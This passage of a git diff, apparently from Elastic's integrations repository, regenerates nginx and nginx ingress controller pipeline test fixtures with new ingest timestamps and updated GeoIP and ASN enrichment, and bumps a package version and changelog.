/%D0%A0%D1%83%D1%81%D1%81%D0%BA%D0%B0%D1%8F%20%D1%88%D0%BA%D0%BE%D0%BB%D0%B0%20-%20InternetUrok%201%D0%BA%D0%BB%D0%B0%D1%81%D1%81/ HTTP/1.1\" 206 7648063 \"http://lessons.example.com/A%20Beka%20G1%20Howe/029_AND_30/15%20reading%20elephants.mp4\" \"Mozilla/5.0 (Linux; Android 5.1.1; KFFOWI) AppleWebKit/537.36 (KHTML, like Gecko) Silk/81.2.16 like Chrome/81.0.4044.138 Safari/537.36\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/nginx/data_stream/access/_dev/test/pipeline/test-nginx.log-expected.json b/packages/nginx/data_stream/access/_dev/test/pipeline/test-nginx.log-expected.json index 6c162949a28..d0b3f9d76fa 100644 --- a/packages/nginx/data_stream/access/_dev/test/pipeline/test-nginx.log-expected.json +++ b/packages/nginx/data_stream/access/_dev/test/pipeline/test-nginx.log-expected.json @@ -44,7 +44,7 @@ } }, "event": { - "ingested": "2021-12-09T13:41:42.512992900Z", + "ingested": "2021-12-14T14:48:34.382243946Z", "original": "10.0.0.2, 10.0.0.1, 127.0.0.1 - - [07/Dec/2016:11:05:07 +0100] \"GET /ocelot HTTP/1.1\" 200 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -112,7 +112,7 @@ } }, "event": { - "ingested": "2021-12-09T13:41:42.513002400Z", + "ingested": "2021-12-14T14:48:34.382246417Z", "original": "172.17.0.1 - - [29/May/2017:19:02:48 +0000] \"GET /stringpatch HTTP/1.1\" 404 612 \"-\" \"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2\" \"-\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -149,6 +149,18 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.14", "ip": "67.43.156.14" }, @@ -182,7 +194,7 @@ } }, "event": { - "ingested": "2021-12-09T13:41:42.513008900Z", + "ingested": "2021-12-14T14:48:34.382246878Z", "original": "10.0.0.2, 10.0.0.1, 67.43.156.14 - - [07/Dec/2016:11:05:07 +0100] \"GET /ocelot HTTP/1.1\" 200 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -217,6 +229,18 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.14", "ip": "67.43.156.14" }, @@ -250,7 +274,7 @@ } }, "event": { - "ingested": "2021-12-09T13:41:42.513013400Z", + "ingested": "2021-12-14T14:48:34.382247234Z", "original": "67.43.156.14 - - [07/Dec/2016:11:05:07 +0100] \"GET /ocelot HTTP/1.1\" 200 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36\"\n\"10.5.102.222, 199.96.1.1, 204.246.1.1\" 10.2.1.185 - - [22/Jan/2016:13:18:29 +0000] \"GET /assets/xxxx?q=100 HTTP/1.1\" 200 25507 \"-\" \"Amazon CloudFront\"\n2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6, 10.225.192.17 10.2.2.121 - - [30/Dec/2016:06:47:09 +0000] \"GET /test.html HTTP/1.1\" 404 8571 \"-\" \"Mozilla/5.0 (compatible; Facebot 1.0; https://developers.facebook.com/docs/sharing/webmasters/crawler)\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -306,7 +330,7 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-12-09T13:41:42.513018600Z", + "ingested": "2021-12-14T14:48:34.382247609Z", "original": "127.0.0.1 - - [12/Apr/2018:09:48:40 +0200] \"\" 400 0 \"-\" \"-\"\nunix: - - [26/Feb/2019:15:39:42 +0100] \"hello\" 400 173 \"-\" \"-\"\nlocalhost - - [29/May/2017:19:02:48 +0000] \"GET /test2 HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2\" \"-\"\nlocalhost, localhost - - [29/May/2017:19:02:48 +0000] \"GET /test2 HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2\" \"-\"\n", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/nginx/data_stream/access/_dev/test/pipeline/test-test-with-host.log-expected.json b/packages/nginx/data_stream/access/_dev/test/pipeline/test-test-with-host.log-expected.json index 208427cae38..f829c774f06 100644 --- a/packages/nginx/data_stream/access/_dev/test/pipeline/test-test-with-host.log-expected.json +++ b/packages/nginx/data_stream/access/_dev/test/pipeline/test-test-with-host.log-expected.json @@ -48,7 +48,7 @@ } }, "event": { - "ingested": "2021-12-09T13:41:43.172715Z", + "ingested": "2021-12-14T14:48:35.072680631Z", "original": "example.com 10.0.0.2, 10.0.0.1, 127.0.0.1 - - [07/Dec/2016:11:05:07 +0100] \"GET /ocelot HTTP/1.1\" 200 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0\"\nexample.com 172.17.0.1 - - [29/May/2017:19:02:48 +0000] \"GET /stringpatch HTTP/1.1\" 404 612 \"-\" \"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2\" \"-\"\nexample.com 10.0.0.2, 10.0.0.1, 67.43.156.14 - - [07/Dec/2016:11:05:07 +0100] \"GET /ocelot HTTP/1.1\" 200 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0\"\nexample.com:80 67.43.156.14 - - [07/Dec/2016:11:05:07 +0100] \"GET /ocelot HTTP/1.1\" 200 571 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36\"\nexample.com:80 \"10.5.102.222, 199.96.1.1, 204.246.1.1\" 10.2.1.185 - - [22/Jan/2016:13:18:29 +0000] \"GET /assets/xxxx?q=100 HTTP/1.1\" 200 25507 \"-\" \"Amazon CloudFront\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -90,18 +90,12 @@ "source": { "geo": { "continent_name": "Europe", - "country_name": "Denmark", + "country_name": "Norway", "location": { "lon": 10.0, - "lat": 56.0 + "lat": 62.0 }, - "country_iso_code": "DK" - }, - "as": { - "number": 62121, - "organization": { - "name": "Christian Ebsen ApS" - } + "country_iso_code": "NO" }, "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" @@ -138,7 +132,7 @@ } }, "event": { - "ingested": "2021-12-09T13:41:43.172728700Z", + "ingested": "2021-12-14T14:48:35.072682974Z", "original": "67.43.156.15 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6, 10.225.192.17 10.2.2.121 - - [30/Dec/2016:06:47:09 +0000] \"GET /test.html HTTP/1.1\" 404 8571 \"-\" \"Mozilla/5.0 (compatible; Facebot 1.0; https://developers.facebook.com/docs/sharing/webmasters/crawler)\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -194,7 +188,7 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-12-09T13:41:43.172732700Z", + "ingested": "2021-12-14T14:48:35.072683446Z", "original": "67.43.156.15:80 127.0.0.1 - - [12/Apr/2018:09:48:40 +0200] \"\" 400 0 \"-\" \"-\"\nexample.com:80 unix: - - [26/Feb/2019:15:39:42 +0100] \"hello\" 400 173 \"-\" \"-\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -254,7 +248,7 @@ } }, "event": { - "ingested": "2021-12-09T13:41:43.172738700Z", + "ingested": "2021-12-14T14:48:35.072683803Z", "original": "67.43.156.15 localhost - - [29/May/2017:19:02:48 +0000] \"GET /test2 HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2\" \"-\"\nexample.com localhost, localhost - - [29/May/2017:19:02:48 +0000] \"GET /test2 HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2\" \"-\"", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/nginx/data_stream/error/_dev/test/pipeline/test-error-raw.log-expected.json b/packages/nginx/data_stream/error/_dev/test/pipeline/test-error-raw.log-expected.json index 76feff53fe3..ad761ec0957 100644 --- a/packages/nginx/data_stream/error/_dev/test/pipeline/test-error-raw.log-expected.json +++ b/packages/nginx/data_stream/error/_dev/test/pipeline/test-error-raw.log-expected.json @@ -20,7 +20,7 @@ "level": "error" }, "event": { - "ingested": "2021-12-09T13:41:43.902411600Z", + "ingested": "2021-12-14T14:48:35.787382431Z", "original": "2016/10/25 14:49:34 [error] 54053#0: *1 open() \"/usr/local/Cellar/nginx/1.10.2_1/html/favicon.ico\" failed (2: No such file or directory), client: 127.0.0.1, server: localhost, request: \"GET /favicon.ico HTTP/1.1\", host: \"localhost:8080\", referrer: \"http://localhost:8080/\"", "category": [ "web" @@ -56,7 +56,7 @@ "level": "error" }, "event": { - "ingested": "2021-12-09T13:41:43.902415500Z", + "ingested": "2021-12-14T14:48:35.787384966Z", "original": "2016/10/25 14:50:44 [error] 54053#0: *3 open() \"/usr/local/Cellar/nginx/1.10.2_1/html/adsasd\" failed (2: No such file or directory), client: 127.0.0.1, server: localhost, request: \"GET /adsasd HTTP/1.1\", host: \"localhost:8080\"", "category": [ "web" @@ -92,7 +92,7 @@ "level": "error" }, "event": { - "ingested": "2021-12-09T13:41:43.902420Z", + "ingested": "2021-12-14T14:48:35.787385442Z", "original": "2019/10/30 23:26:34 [error] 205860#205860: *180289 FastCGI sent in stderr: \"PHP message: PHP Warning: Declaration of FEE_Field_Terms::wrap($content, $taxonomy, $before, $sep, $after) should be compatible with FEE_Field_Post::wrap($content, $post_id = 0) in /var/www/xxx/web/wp-content/plugins/front-end-editor/php/fields/post.php on line 0\nPHP message: PHP Warning: Declaration of FEE_Field_Tags::wrap($content, $before, $sep, $after) should be compatible with FEE_Field_Terms::wrap($content, $taxonomy, $before, $sep, $after) in /var/www/xxx/web/wp-content/plugins/front-end-editor/php/fields/post.php on line 0\nPHP message: PHP Warning: Declaration of FEE_Field_Category::wrap($content, $sep, $parents) should be compatible with FEE_Field_Terms::wrap($content, $taxonomy, $before, $sep, $after) in /var/www/xxx/web/wp-content/plugins/front-end-editor/php/fields/post.php on line 0", "category": [ "web" @@ -128,7 +128,7 @@ "level": "error" }, "event": { - "ingested": "2021-12-09T13:41:43.902426Z", + "ingested": "2021-12-14T14:48:35.787385877Z", "original": "2019/11/05 14:50:44 [error] 54053#0: *3 open() \"/usr/local/Cellar/nginx/1.10.2_1/html/adsasd\" failed (2: No such file or directory), client: 127.0.0.1, server: localhost, request: \"GET /pysio HTTP/1.1\", host: \"localhost:8080\"", "category": [ "web" diff --git a/packages/nginx/manifest.yml b/packages/nginx/manifest.yml index f40978a8339..654d7e24c39 100644 --- a/packages/nginx/manifest.yml +++ b/packages/nginx/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: nginx title: Nginx -version: 1.2.2 +version: 1.2.3 license: basic description: Collect logs and metrics from Nginx HTTP servers with Elastic Agent. type: integration diff --git a/packages/nginx_ingress_controller/changelog.yml b/packages/nginx_ingress_controller/changelog.yml index a84f3d42a83..7b4d336e08f 100644 --- a/packages/nginx_ingress_controller/changelog.yml +++ b/packages/nginx_ingress_controller/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.2.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.2.1" changes: - description: Change test public IPs to the supported subset diff --git a/packages/nginx_ingress_controller/data_stream/access/_dev/test/pipeline/test-ingest-raw.log-expected.json b/packages/nginx_ingress_controller/data_stream/access/_dev/test/pipeline/test-ingest-raw.log-expected.json index 70287af6ce0..dd99a34c442 100644 --- a/packages/nginx_ingress_controller/data_stream/access/_dev/test/pipeline/test-ingest-raw.log-expected.json +++ b/packages/nginx_ingress_controller/data_stream/access/_dev/test/pipeline/test-ingest-raw.log-expected.json @@ -26,16 +26,6 @@ } } }, - "source": { - "address": "192.168.64.1", - "ip": "192.168.64.1" - }, - "url": { - "original": "/products" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-02-07T11:48:51.000Z", "ecs": { "version": "1.12.0" @@ -57,8 +47,12 @@ "status_code": 200 } }, + "source": { + "address": "192.168.64.1", + "ip": "192.168.64.1" + }, "event": { - "ingested": "2021-12-09T13:41:46.109908100Z", + "ingested": "2021-12-14T14:48:38.075886418Z", "original": "192.168.64.1 - - [07/Feb/2020:11:48:51 +0000] \"POST /products HTTP/1.1\" 200 59 \"-\" \"curl/7.54.0\" 89 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 529a007902362a5f51385a5fa7049884", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -77,7 +71,13 @@ "name": "Other" }, "version": "7.54.0" - } + }, + "url": { + "original": "/products" + }, + "tags": [ + "preserve_original_event" + ] }, { "nginx_ingress_controller": { @@ -105,16 +105,6 @@ } } }, - "source": { - "address": "192.168.64.1", - "ip": "192.168.64.1" - }, - "url": { - "original": "/products/42" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-02-07T11:49:15.000Z", "ecs": { "version": "1.12.0" @@ -136,8 +126,12 @@ "status_code": 200 } }, + "source": { + "address": "192.168.64.1", + "ip": "192.168.64.1" + }, "event": { - "ingested": "2021-12-09T13:41:46.109949200Z", + "ingested": "2021-12-14T14:48:38.075889380Z", "original": "192.168.64.1 - - [07/Feb/2020:11:49:15 +0000] \"GET /products/42 HTTP/1.1\" 200 59 \"-\" \"curl/7.54.0\" 91 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 68fa971ce4dfce685fdc01c877bfa645", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -156,7 +150,13 @@ "name": "Other" }, "version": "7.54.0" - } + }, + "url": { + "original": "/products/42" + }, + "tags": [ + "preserve_original_event" + ] }, { "nginx_ingress_controller": { @@ -184,16 +184,6 @@ } } }, - "source": { - "address": "192.168.64.1", - "ip": "192.168.64.1" - }, - "url": { - "original": "/products/42" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-02-07T11:49:30.000Z", "ecs": { "version": "1.12.0" @@ -215,8 +205,12 @@ "status_code": 200 } }, + "source": { + "address": "192.168.64.1", + "ip": "192.168.64.1" + }, "event": { - "ingested": "2021-12-09T13:41:46.109962300Z", + "ingested": "2021-12-14T14:48:38.075889832Z", "original": "192.168.64.1 - - [07/Feb/2020:11:49:30 +0000] \"DELETE /products/42 HTTP/1.1\" 200 59 \"-\" \"curl/7.54.0\" 94 0.000 [default-web-8080] [] 172.17.0.5:8080 59 0.001 200 0be411044cb1cb67580e115413b2da60", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -235,7 +229,13 @@ "name": "Other" }, "version": "7.54.0" - } + }, + "url": { + "original": "/products/42" + }, + "tags": [ + "preserve_original_event" + ] }, { "nginx_ingress_controller": { @@ -263,16 +263,6 @@ } } }, - "source": { - "address": "192.168.64.1", - "ip": "192.168.64.1" - }, - "url": { - "original": "/products/42" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-02-07T11:49:43.000Z", "ecs": { "version": "1.12.0" @@ -294,8 +284,12 @@ "status_code": 200 } }, + "source": { + "address": "192.168.64.1", + "ip": "192.168.64.1" + }, "event": { - "ingested": "2021-12-09T13:41:46.109967300Z", + "ingested": "2021-12-14T14:48:38.075890224Z", "original": "192.168.64.1 - - [07/Feb/2020:11:49:43 +0000] \"PATCH /products/42 HTTP/1.1\" 200 59 \"-\" \"curl/7.54.0\" 93 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 f479ab1d9cc8afcbac9e9f958ff8babc", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -314,7 +308,13 @@ "name": "Other" }, "version": "7.54.0" - } + }, + "url": { + "original": "/products/42" + }, + "tags": [ + "preserve_original_event" + ] }, { "nginx_ingress_controller": { @@ -361,7 +361,7 @@ "ip": "192.168.64.1" }, "event": { - "ingested": "2021-12-09T13:41:46.109978Z", + "ingested": "2021-12-14T14:48:38.075890621Z", "original": "192.168.64.1 - - [07/Feb/2020:11:49:50 +0000] \"PATCHp /products/42 HTTP/1.1\" 400 163 \"-\" \"-\" 0 0.000 [] [] - - - - 4c7d2079340e68353c7d0dfff00b904b", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -425,7 +425,7 @@ "ip": "192.168.64.1" }, "event": { - "ingested": "2021-12-09T13:41:46.109988500Z", + "ingested": "2021-12-14T14:48:38.075891001Z", "original": "192.168.64.1 - - [07/Feb/2020:11:50:09 +0000] \"geti /products/42 HTTP/1.1\" 400 163 \"-\" \"-\" 0 0.000 [] [] - - - - efb0c5aa8be6cdeb4a7e7bd090e3d893", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -470,16 +470,6 @@ } } }, - "source": { - "address": "192.168.64.1", - "ip": "192.168.64.1" - }, - "url": { - "original": "/products/42" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-02-07T11:55:05.000Z", "ecs": { "version": "1.12.0" @@ -501,8 +491,12 @@ "status_code": 200 } }, + "source": { + "address": "192.168.64.1", + "ip": "192.168.64.1" + }, "event": { - "ingested": "2021-12-09T13:41:46.109993100Z", + "ingested": "2021-12-14T14:48:38.075891400Z", "original": "192.168.64.1 - - [07/Feb/2020:11:55:05 +0000] \"GET /products/42 HTTP/1.1\" 200 59 \"-\" \"Wget/1.20.3 (darwin18.6.0)\" 157 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 457b71c3e1ee1887bb809effd301a0ec", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -521,7 +515,13 @@ "name": "Other" }, "version": "1.20.3" - } + }, + "url": { + "original": "/products/42" + }, + "tags": [ + "preserve_original_event" + ] }, { "nginx_ingress_controller": { @@ -549,16 +549,6 @@ } } }, - "source": { - "address": "192.168.64.1", - "ip": "192.168.64.1" - }, - "url": { - "original": "/products/42" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-02-07T11:55:57.000Z", "ecs": { "version": "1.12.0" @@ -580,8 +570,12 @@ "status_code": 200 } }, + "source": { + "address": "192.168.64.1", + "ip": "192.168.64.1" + }, "event": { - "ingested": "2021-12-09T13:41:46.109998300Z", + "ingested": "2021-12-14T14:48:38.075891777Z", "original": "192.168.64.1 - - [07/Feb/2020:11:55:57 +0000] \"GET /products/42 HTTP/1.1\" 200 59 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36\" 450 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 da29abf31e4d6324cebe5e7bca370709", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -605,7 +599,13 @@ "name": "Mac" }, "version": "79.0.3945.130" - } + }, + "url": { + "original": "/products/42" + }, + "tags": [ + "preserve_original_event" + ] }, { "nginx_ingress_controller": { @@ -633,16 +633,6 @@ } } }, - "source": { - "address": "192.168.64.1", - "ip": "192.168.64.1" - }, - "url": { - "original": "/favicon.ico" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-02-07T11:55:57.000Z", "ecs": { "version": "1.12.0" @@ -665,8 +655,12 @@ "status_code": 200 } }, + "source": { + "address": "192.168.64.1", + "ip": "192.168.64.1" + }, "event": { - "ingested": "2021-12-09T13:41:46.110002800Z", + "ingested": "2021-12-14T14:48:38.075892164Z", "original": "192.168.64.1 - - [07/Feb/2020:11:55:57 +0000] \"GET /favicon.ico HTTP/1.1\" 200 59 \"http://hello-world.info/products/42\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36\" 381 0.000 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 e983c8cf3d713548baa50c9e2fffeb34", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -690,7 +684,13 @@ "name": "Mac" }, "version": "79.0.3945.130" - } + }, + "url": { + "original": "/favicon.ico" + }, + "tags": [ + "preserve_original_event" + ] }, { "nginx_ingress_controller": { @@ -718,16 +718,6 @@ } } }, - "source": { - "address": "192.168.64.1", - "ip": "192.168.64.1" - }, - "url": { - "original": "/v2" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-02-07T11:56:24.000Z", "ecs": { "version": "1.12.0" @@ -749,8 +739,12 @@ "status_code": 200 } }, + "source": { + "address": "192.168.64.1", + "ip": "192.168.64.1" + }, "event": { - "ingested": "2021-12-09T13:41:46.110008100Z", + "ingested": "2021-12-14T14:48:38.075892595Z", "original": "192.168.64.1 - - [07/Feb/2020:11:56:24 +0000] \"GET /v2 HTTP/1.1\" 200 61 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36\" 441 0.002 [default-web2-8080] [] 172.17.0.6:8080 61 0.001 200 3d7ff18ff4181a7db5013a76f975d900", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -774,7 +768,13 @@ "name": "Mac" }, "version": "79.0.3945.130" - } + }, + "url": { + "original": "/v2" + }, + "tags": [ + "preserve_original_event" + ] }, { "nginx_ingress_controller": { @@ -802,16 +802,6 @@ } } }, - "source": { - "address": "192.168.64.1", - "ip": "192.168.64.1" - }, - "url": { - "original": "/favicon.ico" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-02-07T11:56:24.000Z", "ecs": { "version": "1.12.0" @@ -834,8 +824,12 @@ "status_code": 200 } }, + "source": { + "address": "192.168.64.1", + "ip": "192.168.64.1" + }, "event": { - "ingested": "2021-12-09T13:41:46.110020100Z", + "ingested": "2021-12-14T14:48:38.075892996Z", "original": "192.168.64.1 - - [07/Feb/2020:11:56:24 +0000] \"GET /favicon.ico HTTP/1.1\" 200 59 \"http://hello-world.info/v2\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36\" 372 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.002 200 d131fe4bcd359cf947f75efca4bfa553", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -859,7 +853,13 @@ "name": "Mac" }, "version": "79.0.3945.130" - } + }, + "url": { + "original": "/favicon.ico" + }, + "tags": [ + "preserve_original_event" + ] }, { "nginx_ingress_controller": { @@ -887,16 +887,6 @@ } } }, - "source": { - "address": "192.168.64.1", - "ip": "192.168.64.1" - }, - "url": { - "original": "/products/42" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-02-07T11:56:36.000Z", "ecs": { "version": "1.12.0" @@ -918,8 +908,12 @@ "status_code": 200 } }, + "source": { + "address": "192.168.64.1", + "ip": "192.168.64.1" + }, "event": { - "ingested": "2021-12-09T13:41:46.110201Z", + "ingested": "2021-12-14T14:48:38.075893531Z", "original": "192.168.64.1 - - [07/Feb/2020:11:56:36 +0000] \"GET /products/42 HTTP/1.1\" 200 59 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15\" 369 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.001 200 ef6629fcaaa1ea0d1a843cf2bf40571d", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -943,7 +937,13 @@ "name": "Mac" }, "version": "13.0.5" - } + }, + "url": { + "original": "/products/42" + }, + "tags": [ + "preserve_original_event" + ] }, { "nginx_ingress_controller": { @@ -971,16 +971,6 @@ } } }, - "source": { - "address": "192.168.64.1", - "ip": "192.168.64.1" - }, - "url": { - "original": "/favicon.ico" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-02-07T11:56:36.000Z", "ecs": { "version": "1.12.0" @@ -1003,8 +993,12 @@ "status_code": 200 } }, + "source": { + "address": "192.168.64.1", + "ip": "192.168.64.1" + }, "event": { - "ingested": "2021-12-09T13:41:46.110205500Z", + "ingested": "2021-12-14T14:48:38.075893954Z", "original": "192.168.64.1 - - [07/Feb/2020:11:56:36 +0000] \"GET /favicon.ico HTTP/1.1\" 200 59 \"http://hello-world.info/products/42\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15\" 325 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.001 200 2593a1126588922449c183c8d9ddbbeb", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -1028,7 +1022,13 @@ "name": "Mac" }, "version": "13.0.5" - } + }, + "url": { + "original": "/favicon.ico" + }, + "tags": [ + "preserve_original_event" + ] }, { "nginx_ingress_controller": { @@ -1056,16 +1056,6 @@ } } }, - "source": { - "address": "192.168.64.1", - "ip": "192.168.64.1" - }, - "url": { - "original": "/products/42" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-02-07T11:56:54.000Z", "ecs": { "version": "1.12.0" @@ -1087,8 +1077,12 @@ "status_code": 200 } }, + "source": { + "address": "192.168.64.1", + "ip": "192.168.64.1" + }, "event": { - "ingested": "2021-12-09T13:41:46.110210700Z", + "ingested": "2021-12-14T14:48:38.075894325Z", "original": "192.168.64.1 - - [07/Feb/2020:11:56:54 +0000] \"GET /products/42 HTTP/1.1\" 200 59 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15\" 369 0.002 [default-web-8080] [] 172.17.0.5:8080 59 0.002 200 0f76ea730f282d5759018eb756b23b14", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -1112,7 +1106,13 @@ "name": "Mac" }, "version": "13.0.5" - } + }, + "url": { + "original": "/products/42" + }, + "tags": [ + "preserve_original_event" + ] }, { "nginx_ingress_controller": { @@ -1140,16 +1140,6 @@ } } }, - "source": { - "address": "192.168.64.1", - "ip": "192.168.64.1" - }, - "url": { - "original": "/" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-02-07T11:56:54.000Z", "ecs": { "version": "1.12.0" @@ -1171,8 +1161,12 @@ "status_code": 200 } }, + "source": { + "address": "192.168.64.1", + "ip": "192.168.64.1" + }, "event": { - "ingested": "2021-12-09T13:41:46.110215800Z", + "ingested": "2021-12-14T14:48:38.075894754Z", "original": "192.168.64.1 - - [07/Feb/2020:11:56:54 +0000] \"GET / HTTP/1.1\" 200 59 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15\" 358 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.001 200 21efd18e3a7952fc78c0f2dcc1f05e69", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -1196,7 +1190,13 @@ "name": "Mac" }, "version": "13.0.5" - } + }, + "url": { + "original": "/" + }, + "tags": [ + "preserve_original_event" + ] }, { "nginx_ingress_controller": { @@ -1224,16 +1224,6 @@ } } }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" - }, - "url": { - "original": "/favicon.ico" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-02-07T11:56:54.000Z", "ecs": { "version": "1.12.0" @@ -1256,8 +1246,24 @@ "status_code": 200 } }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:41:46.110220400Z", + "ingested": "2021-12-14T14:48:38.075895129Z", "original": "67.43.156.13 - - [07/Feb/2020:11:56:54 +0000] \"GET /favicon.ico HTTP/1.1\" 200 59 \"http://hello-world.info/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15\" 314 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.002 200 e096809c2cb46f004c3b538b23916e5b", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -1281,7 +1287,13 @@ "name": "Mac" }, "version": "13.0.5" - } + }, + "url": { + "original": "/favicon.ico" + }, + "tags": [ + "preserve_original_event" + ] }, { "nginx_ingress_controller": { @@ -1309,16 +1321,6 @@ } } }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" - }, - "url": { - "original": "/v2" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": 